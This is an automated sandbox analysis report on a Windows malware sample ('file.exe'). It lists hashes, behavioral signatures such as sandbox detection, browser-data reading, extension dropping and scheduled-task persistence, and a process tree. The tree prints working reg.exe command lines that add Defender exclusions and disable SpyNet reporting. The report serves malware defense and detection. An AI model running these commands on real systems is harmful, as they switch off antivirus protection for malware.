Analysis

Max time kernel: 136s
Max time network: 139s
Platform: windows7_x64
Resource: win7-20220812-en
Resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
Submitted: 06-02-2023 22:14

Static task: static1
Behavioral task: behavioral1
Sample: file.exe
Resource: win7-20220812-en
General

Target: file.exe
Size: 7.3MB
MD5: b5ceeee8096c730a9156dc752ad384b4
SHA1: 4f4318e822b870e78980f71dcaa70d21f22e3135
SHA256: b0b4acd86937db49d7e4db0c3791442a85747cd677cd84cb78d41391c15ec495
SHA512: 1b79d14a818c574f8f81b290856c476d35ed9afe1ae174fbc67155572a2b1b33a078a82c1bfdeb454a29f75ce2a84986d596a79614c30551a6a56ffab9f21218
SSDEEP: 98304:91Oueznz7VB2EP1Wb5QdvDdmSwbOQC2a6j/lP7DMXnn41Xy8PtNGeeq13VApXq3V:91OBVoSWWBqNvFRDAVMGefAXMra5E1WW
Malware Config
Signatures
Modifies Windows Defender Real-time Protection settings
Processes: reg.exe, reg.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Processes: reg.exe, reg.exe, reg.exe, reg.exe, reg.exe, reg.exe, reg.exe, conhost.exe, reg.exe, reg.exe, reg.exe, reg.exe, reg.exe, reg.exe, reg.exe, reg.exe, conhost.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QqSrWmvdGtwU2 = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\cfvymemHCAUn = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jUlWXsHGbnJNPdLP = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RIuAFuLLU = "0" | conhost.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FpvksngNCKIjC = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths |
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\BekoRFZthbLHeaVB = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\BekoRFZthbLHeaVB = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jUlWXsHGbnJNPdLP = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FpvksngNCKIjC = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jUlWXsHGbnJNPdLP = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QqSrWmvdGtwU2 = "0" |
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | conhost.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\cfvymemHCAUn = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | conhost.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RIuAFuLLU = "0" | conhost.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\jUlWXsHGbnJNPdLP = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Blocklisted process makes network request 1 IoCs
Processes: rundll32.exe
  flow | pid | process
  21 | 1664 | rundll32.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: Install.exe, rundll32.exe
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: twWLSVy.exe
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Control Panel\International\Geo\Nation | twWLSVy.exe
Executes dropped EXE 4 IoCs
Processes: Install.exe, Install.exe, TWjAkEt.exe, twWLSVy.exe
  pid | process
  896 | Install.exe
  940 | Install.exe
  304 | TWjAkEt.exe
  1104 | twWLSVy.exe
Loads dropped DLL 12 IoCs
Processes: file.exe, Install.exe, Install.exe, rundll32.exe
  pid | process | count
  752 | file.exe | 1
  896 | Install.exe | 4
  940 | Install.exe | 3
  1664 | rundll32.exe | 4
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops Chrome extension 1 IoCs
Processes: twWLSVy.exe
  description | ioc | process
  File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json | twWLSVy.exe
Drops file in System32 directory 19 IoCs
Processes: twWLSVy.exe, Install.exe, TWjAkEt.exe, powershell.EXE, powershell.EXE, rundll32.exe, powershell.EXE, powershell.EXE
  description | ioc | process
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 | twWLSVy.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 | twWLSVy.exe
  File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
  File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | TWjAkEt.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | twWLSVy.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 | twWLSVy.exe
  File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | twWLSVy.exe
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
  File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | TWjAkEt.exe
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | twWLSVy.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | rundll32.exe
  File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | TWjAkEt.exe
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | twWLSVy.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | twWLSVy.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | twWLSVy.exe
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 | twWLSVy.exe
Drops file in Program Files directory 13 IoCs
Processes: twWLSVy.exe
  description | ioc | process
  File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | twWLSVy.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | twWLSVy.exe
  File created | C:\Program Files (x86)\RIuAFuLLU\zvTOjjj.xml | twWLSVy.exe
  File created | C:\Program Files (x86)\QqSrWmvdGtwU2\XbpzIKwuxSjCf.dll | twWLSVy.exe
  File created | C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\LGLcFvs.dll | twWLSVy.exe
  File created | C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\mKvNqep.xml | twWLSVy.exe
  File created | C:\Program Files (x86)\FpvksngNCKIjC\ZWWHTxe.dll | twWLSVy.exe
  File created | C:\Program Files (x86)\RIuAFuLLU\bzKuSC.dll | twWLSVy.exe
  File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | twWLSVy.exe
  File created | C:\Program Files (x86)\QqSrWmvdGtwU2\jjOOKBz.xml | twWLSVy.exe
  File created | C:\Program Files (x86)\FpvksngNCKIjC\uctwdBY.xml | twWLSVy.exe
  File created | C:\Program Files (x86)\cfvymemHCAUn\vtZONra.dll | twWLSVy.exe
  File created | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | twWLSVy.exe
Drops file in Windows directory 4 IoCs
Processes: schtasks.exe, schtasks.exe, schtasks.exe, schtasks.exe
  description | ioc | process
  File created | C:\Windows\Tasks\bCfEGNwGDQwhWneLvC.job | schtasks.exe
  File created | C:\Windows\Tasks\cfFFKgQyvKFYWQGgS.job | schtasks.exe
  File created | C:\Windows\Tasks\qcUOvNLqmSmqpxF.job | schtasks.exe
  File created | C:\Windows\Tasks\vdoHbRZAyoFFuVbVu.job | schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe (13 instances)
  pid | process
  1988 | schtasks.exe
  2036 | schtasks.exe
  1424 | schtasks.exe
  1068 | schtasks.exe
  1724 | schtasks.exe
  1988 | schtasks.exe
  1920 | schtasks.exe
  820 | schtasks.exe
  1944 | schtasks.exe
  1496 | schtasks.exe
  1112 | schtasks.exe
  1752 | schtasks.exe
  1948 | schtasks.exe
Enumerates system info in registry 2 TTPs 4 IoCs
Processes: rundll32.exe, Install.exe
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Modifies data under HKEY_USERS 64 IoCs
Processes: rundll32.exe, wscript.exe, twWLSVy.exe
  description | ioc | process
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-dd-0f-5e-73-0c\WpadDecision = "0" | rundll32.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | wscript.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | twWLSVy.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | rundll32.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings | wscript.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-dd-0f-5e-73-0c | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings | wscript.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{44705F7C-6AA8-4ED6-A2F5-774BD2740C95}\d6-dd-0f-5e-73-0c | rundll32.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | wscript.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{44705F7C-6AA8-4ED6-A2F5-774BD2740C95}\WpadDecision = "0" | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{44705F7C-6AA8-4ED6-A2F5-774BD2740C95} | twWLSVy.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{44705F7C-6AA8-4ED6-A2F5-774BD2740C95}\WpadDecisionReason = "1" | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | twWLSVy.exe
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-dd-0f-5e-73-0c\WpadDecisionTime = 80503702813ad901 | rundll32.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft | wscript.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | wscript.exe
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | twWLSVy.exe
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{44705F7C-6AA8-4ED6-A2F5-774BD2740C95}\d6-dd-0f-5e-73-0c | twWLSVy.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-dd-0f-5e-73-0c\WpadDecision = "0" | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | twWLSVy.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | rundll32.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | rundll32.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-dd-0f-5e-73-0c\WpadDetectedUrl | rundll32.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | wscript.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | twWLSVy.exe
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | twWLSVy.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | twWLSVy.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | rundll32.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | twWLSVy.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software | wscript.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host | wscript.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{44705F7C-6AA8-4ED6-A2F5-774BD2740C95}\WpadNetworkName = "Network 3" | twWLSVy.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\d6-dd-0f-5e-73-0c\WpadDecisionReason = "1" | twWLSVy.exe
Suspicious behavior: EnumeratesProcesses 29 IoCs
Processes: powershell.EXE, powershell.EXE, powershell.EXE, powershell.EXE, twWLSVy.exe
  pid | process | count
  1244 | powershell.EXE | 3
  280 | powershell.EXE | 3
  2020 | powershell.EXE | 3
  1220 | powershell.EXE | 3
  1104 | twWLSVy.exe | 17
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes: powershell.EXE, powershell.EXE, powershell.EXE, powershell.EXE
  description | pid | process
  Token: SeDebugPrivilege | 1244 | powershell.EXE
  Token: SeDebugPrivilege | 280 | powershell.EXE
  Token: SeDebugPrivilege | 2020 | powershell.EXE
  Token: SeDebugPrivilege | 1220 | powershell.EXE
Suspicious use of WriteProcessMemory 64 IoCs
Processes: file.exe, Install.exe, Install.exe, forfiles.exe, forfiles.exe, cmd.exe, cmd.exe
  description | pid | process | target process | count
  PID 752 wrote to memory of 896 | 752 | file.exe | Install.exe | 7
  PID 896 wrote to memory of 940 | 896 | Install.exe | Install.exe | 7
  PID 940 wrote to memory of 472 | 940 | Install.exe | forfiles.exe | 7
  PID 940 wrote to memory of 2004 | 940 | Install.exe | forfiles.exe | 7
  PID 472 wrote to memory of 1148 | 472 | forfiles.exe | cmd.exe | 7
  PID 2004 wrote to memory of 1516 | 2004 | forfiles.exe | cmd.exe | 7
  PID 1516 wrote to memory of 2020 | 1516 | cmd.exe | reg.exe | 7
  PID 1148 wrote to memory of 324 | 1148 | cmd.exe | reg.exe | 7
  PID 1516 wrote to memory of 704 | 1516 | cmd.exe | reg.exe | 7
  PID 1148 wrote to memory of 284 | 1148 | cmd.exe | reg.exe | 1
Processes

[1] C:\Users\Admin\AppData\Local\Temp\file.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\file.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

    [2] C:\Users\Admin\AppData\Local\Temp\7zSFA86.tmp\Install.exe
        Command line: .\Install.exe
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory

        [3] C:\Users\Admin\AppData\Local\Temp\7zSFE8B.tmp\Install.exe
            Command line: .\Install.exe /S /site_id "525403"
            - Checks BIOS information in registry
            - Executes dropped EXE
            - Loads dropped DLL
            - Drops file in System32 directory
            - Enumerates system info in registry
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\SysWOW64\forfiles.exe
                Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                - Suspicious use of WriteProcessMemory

                [5] C:\Windows\SysWOW64\cmd.exe
                    Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                    - Suspicious use of WriteProcessMemory

                    [6] \??\c:\windows\SysWOW64\reg.exe
                        Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

                    [6] \??\c:\windows\SysWOW64\reg.exe
                        Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

            [4] C:\Windows\SysWOW64\forfiles.exe
                Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                - Suspicious use of WriteProcessMemory

                [5] C:\Windows\SysWOW64\cmd.exe
                    Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                    - Suspicious use of WriteProcessMemory

